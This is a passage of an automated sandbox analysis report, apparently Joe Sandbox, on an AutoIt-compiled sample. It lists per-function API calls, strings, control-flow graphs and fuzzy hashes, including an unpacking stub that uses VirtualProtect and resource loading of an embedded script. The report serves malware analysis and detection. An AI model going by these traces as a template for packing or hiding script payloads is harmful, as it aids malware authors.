                                    • Opcode Fuzzy Hash: dfcd54cb090c9ff1043668a7625ef7009df7c54075aa4e1b17fd70d685164ccf
                                    • Instruction Fuzzy Hash: A691C23298D7C5DEC735EB7884501AABFF5FF2A304B44496ED0D6D7B01D220A908D759
                                    Function 00884E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1045 884e89-884ea1 CreateStreamOnHGlobal 1046 884ec1-884ec6 1045->1046 1047 884ea3-884eba FindResourceExW 1045->1047 1048 8bd933-8bd942 LoadResource 1047->1048 1049 884ec0 1047->1049 1048->1049 1050 8bd948-8bd956 SizeofResource 1048->1050 1049->1046 1050->1049 1051 8bd95c-8bd967 LockResource 1050->1051 1051->1049 1052 8bd96d-8bd975 1051->1052 1053 8bd979-8bd98b 1052->1053 1053->1049
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00884E99
                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00884D8E,?,?,00000000,00000000), ref: 00884EB0
                                    • LoadResource.KERNEL32(?,00000000,?,?,00884D8E,?,?,00000000,00000000,?,?,?,?,?,?,00884E2F), ref: 008BD937
                                    • SizeofResource.KERNEL32(?,00000000,?,?,00884D8E,?,?,00000000,00000000,?,?,?,?,?,?,00884E2F), ref: 008BD94C
                                    • LockResource.KERNEL32(00884D8E,?,?,00884D8E,?,?,00000000,00000000,?,?,?,?,?,?,00884E2F,00000000), ref: 008BD95F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                    • String ID: SCRIPT
                                    • API String ID: 3051347437-3967369404
                                    • Opcode ID: 2c309e30286741f2da280b40da954c0db7e02d62160dfa97c6acb6be6dde4c3a
                                    • Instruction ID: 84802aae051a2c0c92cca75176950666ec67435e41e385978aaf1b5a62c7941a
                                    • Opcode Fuzzy Hash: 2c309e30286741f2da280b40da954c0db7e02d62160dfa97c6acb6be6dde4c3a
                                    • Instruction Fuzzy Hash: 0B119E72250701BFD7209B65EC48F677BBAFBC5B21F104268F416C6650EB61E9009660
                                    Function 009D9A50 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1091 9d9a50-9d9a5d 1092 9d9a6a-9d9a6f 1091->1092 1093 9d9a71 1092->1093 1094 9d9a60-9d9a65 1093->1094 1095 9d9a73 1093->1095 1096 9d9a66-9d9a68 1094->1096 1097 9d9a78-9d9a7a 1095->1097 1096->1092 1096->1093 1098 9d9a7c-9d9a81 1097->1098 1099 9d9a83-9d9a87 1097->1099 1098->1099 1100 9d9a89 1099->1100 1101 9d9a94-9d9a97 1099->1101 1102 9d9a8b-9d9a92 1100->1102 1103 9d9ab3-9d9ab8 1100->1103 1104 9d9a99-9d9a9e 1101->1104 1105 9d9aa0-9d9aa2 1101->1105 1102->1101 1102->1103 1106 9d9acb-9d9acd 1103->1106 1107 9d9aba-9d9ac3 1103->1107 1104->1105 1105->1097 1110 9d9acf-9d9ad4 1106->1110 1111 9d9ad6 1106->1111 1108 9d9b3a-9d9b3d 1107->1108 1109 9d9ac5-9d9ac9 1107->1109 1112 9d9b42-9d9b45 1108->1112 1109->1111 1110->1111 1113 9d9ad8-9d9adb 1111->1113 1114 9d9aa4-9d9aa6 1111->1114 1117 9d9b47-9d9b49 1112->1117 1118 9d9add-9d9ae2 1113->1118 1119 9d9ae4 1113->1119 1115 9d9aaf-9d9ab1 1114->1115 1116 9d9aa8-9d9aad 1114->1116 1120 9d9b05-9d9b14 1115->1120 1116->1115 1117->1112 1121 9d9b4b-9d9b4e 1117->1121 1118->1119 1119->1114 1122 9d9ae6-9d9ae8 1119->1122 1123 9d9b24-9d9b31 1120->1123 1124 9d9b16-9d9b1d 1120->1124 1121->1112 1125 9d9b50-9d9b6c 1121->1125 1126 9d9aea-9d9aef 1122->1126 1127 9d9af1-9d9af5 1122->1127 1123->1123 1130 9d9b33-9d9b35 1123->1130 1124->1124 1129 9d9b1f 1124->1129 1125->1117 1131 9d9b6e 1125->1131 1126->1127 1127->1122 1128 9d9af7 1127->1128 1132 9d9af9-9d9b00 1128->1132 1133 9d9b02 1128->1133 1129->1096 1130->1096 1134 9d9b74-9d9b78 1131->1134 1132->1122 1132->1133 1133->1120 1135 9d9bbf-9d9bc2 1134->1135 1136 9d9b7a-9d9b90 LoadLibraryA 1134->1136 1138 9d9bc5-9d9bcc 1135->1138 1137 9d9b91-9d9b96 1136->1137 1137->1134 1139 9d9b98-9d9b9a 1137->1139 1140 9d9bce-9d9bd0 1138->1140 1141 9d9bf0-9d9c20 VirtualProtect * 2 1138->1141 1142 9d9b9c-9d9ba2 1139->1142 1143 9d9ba3-9d9bb0 GetProcAddress 1139->1143 1144 9d9be3-9d9bee 1140->1144 1145 9d9bd2-9d9be1 1140->1145 1146 9d9c24-9d9c28 1141->1146 1142->1143 1147 9d9bb9 ExitProcess 1143->1147 1148 9d9bb2-9d9bb7 1143->1148 1144->1145 1145->1138 1146->1146 1149 9d9c2a 1146->1149 1148->1137
                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 009D9B8A
                                    • GetProcAddress.KERNEL32(?,009D2FF9), ref: 009D9BA8
                                    • ExitProcess.KERNEL32(?,009D2FF9), ref: 009D9BB9
                                    • VirtualProtect.KERNELBASE(00880000,00001000,00000004,?,00000000), ref: 009D9C07
                                    • VirtualProtect.KERNELBASE(00880000,00001000), ref: 009D9C1C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                    • String ID:
                                    • API String ID: 1996367037-0
                                    • Opcode ID: 40b62bfaee3175b61773ca67ec831891edf92d249dbb3b1564182c3257822b3e
                                    • Instruction ID: 709eed7c50a6d323005f0947c3efd7959be86bcaa1930c0259eb7fed215c5dae
                                    • Opcode Fuzzy Hash: 40b62bfaee3175b61773ca67ec831891edf92d249dbb3b1564182c3257822b3e
                                    • Instruction Fuzzy Hash: 28511773AD43524BD720AEB8DCC0661B798EB52324B294B3BD5E2C73C5E7A85C05C760
                                    Function 0088FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID:
                                    • API String ID: 3964851224-0
                                    • Opcode ID: 141d23d19d773fc81ee48aac4657f72dcf3044bcf8f113863f5ad12157918264
                                    • Instruction ID: c225d4ace963e5c797eb386d0f9c39a3be5b5172f161c42287e62f52a7ac5370
                                    • Opcode Fuzzy Hash: 141d23d19d773fc81ee48aac4657f72dcf3044bcf8f113863f5ad12157918264
                                    • Instruction Fuzzy Hash: 879238706083459FDB20EF18C490B2AB7E1FB85314F18896DE99ADB262D771EC45CF92
                                    Function 008E445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?,008BE398), ref: 008E446A
                                    • FindFirstFileW.KERNELBASE(?,?), ref: 008E447B
                                    • FindClose.KERNEL32(00000000), ref: 008E448B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: FileFind$AttributesCloseFirst
                                    • String ID:
                                    • API String ID: 48322524-0
                                    • Opcode ID: 7f0693936b45c5a014bf4f305c02a90846bcc8e31da802d1481b0bc1fc4bc8e7
                                    • Instruction ID: 035c40c107375fe43d08f181b4be8b1ba8579a373854449777d0a4c152d8f48b
                                    • Opcode Fuzzy Hash: 7f0693936b45c5a014bf4f305c02a90846bcc8e31da802d1481b0bc1fc4bc8e7
                                    • Instruction Fuzzy Hash: 01E0D8335255456B8220AB38EC0D4E9779CEE06339F100715F939D14D0E7745A00A599
                                    Function 0088E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                    Download Yara Rule
                                    Strings
                                    • Variable must be of type 'Object'., xrefs: 008C3E62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Variable must be of type 'Object'.
                                    • API String ID: 0-109567571
                                    • Opcode ID: 0b74333053d4f21dcbe16ad5b5ec286fb4d758629ac80f2761528386c7a4d12c
                                    • Instruction ID: 1066ff02b769e9fb4025a811366d2b23cd19c3ab32db1e21f44ecbe52c943a6f
                                    • Opcode Fuzzy Hash: 0b74333053d4f21dcbe16ad5b5ec286fb4d758629ac80f2761528386c7a4d12c
                                    • Instruction Fuzzy Hash: DBA2AF75A00219CFCB24EF98C480AAEB7B2FF59314F248069E915EB352D775ED42CB91
                                    Function 008909D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00890A5B
                                    • timeGetTime.WINMM ref: 00890D16
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00890E53
                                    • Sleep.KERNEL32(0000000A), ref: 00890E61
                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00890EFA
                                    • DestroyWindow.USER32 ref: 00890F06
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00890F20
                                    • Sleep.KERNEL32(0000000A,?,?), ref: 008C4E83
                                    • TranslateMessage.USER32(?), ref: 008C5C60
                                    • DispatchMessageW.USER32(?), ref: 008C5C6E
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008C5C82
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                    • API String ID: 4212290369-3242690629
                                    • Opcode ID: ddc8948992b838f99e43923c35f16f6bcdc03d92df4404a624145de1a7cde086
                                    • Instruction ID: 4b1c6c69562fb229c8851470338058dfbc276c788e638da1306389a7a1a9ef67
                                    • Opcode Fuzzy Hash: ddc8948992b838f99e43923c35f16f6bcdc03d92df4404a624145de1a7cde086
                                    • Instruction Fuzzy Hash: C4B28D70608745DFDB24EB28C894F6AB7F5FB85304F18491DE49AD72A1CB71E884DB82
                                    Function 008E9155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 008E8F5F: __time64.LIBCMT ref: 008E8F69
                                      • Part of subcall function 00884EE5: _fseek.LIBCMT ref: 00884EFD
                                    • __wsplitpath.LIBCMT ref: 008E9234
                                      • Part of subcall function 008A40FB: __wsplitpath_helper.LIBCMT ref: 008A413B
                                    • _wcscpy.LIBCMT ref: 008E9247
                                    • _wcscat.LIBCMT ref: 008E925A
                                    • __wsplitpath.LIBCMT ref: 008E927F
                                    • _wcscat.LIBCMT ref: 008E9295
                                    • _wcscat.LIBCMT ref: 008E92A8
                                      • Part of subcall function 008E8FA5: _memmove.LIBCMT ref: 008E8FDE
                                      • Part of subcall function 008E8FA5: _memmove.LIBCMT ref: 008E8FED
                                    • _wcscmp.LIBCMT ref: 008E91EF
                                      • Part of subcall function 008E9734: _wcscmp.LIBCMT ref: 008E9824
                                      • Part of subcall function 008E9734: _wcscmp.LIBCMT ref: 008E9837
                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008E9452
                                    • _wcsncpy.LIBCMT ref: 008E94C5
                                    • DeleteFileW.KERNEL32(?,?), ref: 008E94FB
                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 008E9511
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008E9522
                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008E9534
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                    • String ID:
                                    • API String ID: 1500180987-0
                                    • Opcode ID: 473c582a587f4378b6a4051813275c847a8091921f922e444a20c78211a3f992
                                    • Instruction ID: 4b8316a563407b49f1c8061d37685450f904ba7947af9c011fda9682811ec557
                                    • Opcode Fuzzy Hash: 473c582a587f4378b6a4051813275c847a8091921f922e444a20c78211a3f992
                                    • Instruction Fuzzy Hash: E3C13CB1D00219AADF21DF99CC85ADEB7BDFF96310F0040AAF609E7151EB709A448F65
                                    Function 0088708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00884706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009452F8,?,008837AE,?), ref: 00884724
                                      • Part of subcall function 008A050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00887165), ref: 008A052D
                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008871A8
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008BE8C8
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008BE909
                                    • RegCloseKey.ADVAPI32(?), ref: 008BE947
                                    • _wcscat.LIBCMT ref: 008BE9A0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                    • API String ID: 2673923337-2727554177
                                    • Opcode ID: c9a9442e2bb3a594ef463b4471a63f190732a4deb6a7d3158f8ff71df8823be7
                                    • Instruction ID: 6e41bc42fa35b6657c288c071e5e801b1dff11cb0c5b84452cfbd35b2236e0cc
                                    • Opcode Fuzzy Hash: c9a9442e2bb3a594ef463b4471a63f190732a4deb6a7d3158f8ff71df8823be7
                                    • Instruction Fuzzy Hash: B3715BB5518301AED310EF29E851DABBBF8FF86310B50052EF465C72A1EBB19948DB53
                                    Function 00883A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00883A50
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00883A5F
                                    • LoadIconW.USER32(00000063), ref: 00883A76
                                    • LoadIconW.USER32(000000A4), ref: 00883A88
                                    • LoadIconW.USER32(000000A2), ref: 00883A9A
                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00883AC0
                                    • RegisterClassExW.USER32(?), ref: 00883B16
                                      • Part of subcall function 00883041: GetSysColorBrush.USER32(0000000F), ref: 00883074
                                      • Part of subcall function 00883041: RegisterClassExW.USER32(00000030), ref: 0088309E
                                      • Part of subcall function 00883041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008830AF
                                      • Part of subcall function 00883041: LoadIconW.USER32(000000A9), ref: 008830F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                    • String ID: #$0$AutoIt v3
                                    • API String ID: 2880975755-4155596026
                                    • Opcode ID: bd32b0f7ffd34e47e0fe70232161876fc4c605d3f6fe255c660e239430aee8fd
                                    • Instruction ID: cacfe3b3a33fda38b92169fcd8611ebf5b2e979550f472445f5b989857e01d82
                                    • Opcode Fuzzy Hash: bd32b0f7ffd34e47e0fe70232161876fc4c605d3f6fe255c660e239430aee8fd
                                    • Instruction Fuzzy Hash: 23213779928708AFEB21DFA4EC19F9D7BB4FB09711F01012AE510A62A2D3B55640AF85
                                    Function 00883766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                    • API String ID: 1825951767-3513169116
                                    • Opcode ID: caaf74eace35837b2c358d520a5f98fee59626306a2e66ace735cee4de00d34c
                                    • Instruction ID: 8ab1a83b04505b7ee6058d2fc9376944f0dea6db7caef457dc7088a8fc9938b3
                                    • Opcode Fuzzy Hash: caaf74eace35837b2c358d520a5f98fee59626306a2e66ace735cee4de00d34c
                                    • Instruction Fuzzy Hash: 12A16D7291021DABCB14FBA8DC51EEEB778FF15714F44042AE416E7192EF749A08CB62
                                    Function 0088301C Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 71registrywindowclipboardCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00883074
                                    • RegisterClassExW.USER32(00000030), ref: 0088309E
                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008830AF
                                    • LoadIconW.USER32(000000A9), ref: 008830F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                    • API String ID: 975902462-1005189915
                                    • Opcode ID: 29dd30c7b3333d89dd7d3312f965dcc232bf51f7ce5f15406ac9c9f0cebc2653
                                    • Instruction ID: 0e52b13cd2c5a8864817e735c99d075fc18bda0fbf72e49ba82796ac23810c7b
                                    • Opcode Fuzzy Hash: 29dd30c7b3333d89dd7d3312f965dcc232bf51f7ce5f15406ac9c9f0cebc2653
                                    • Instruction Fuzzy Hash: D03145B5925209EFDB60CFE4E889AC9BBF4FB09310F10412AF590E62A1D7B50685DF91
                                    Function 00883041 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 54registrywindowclipboardCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00883074
                                    • RegisterClassExW.USER32(00000030), ref: 0088309E
                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008830AF
                                    • LoadIconW.USER32(000000A9), ref: 008830F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
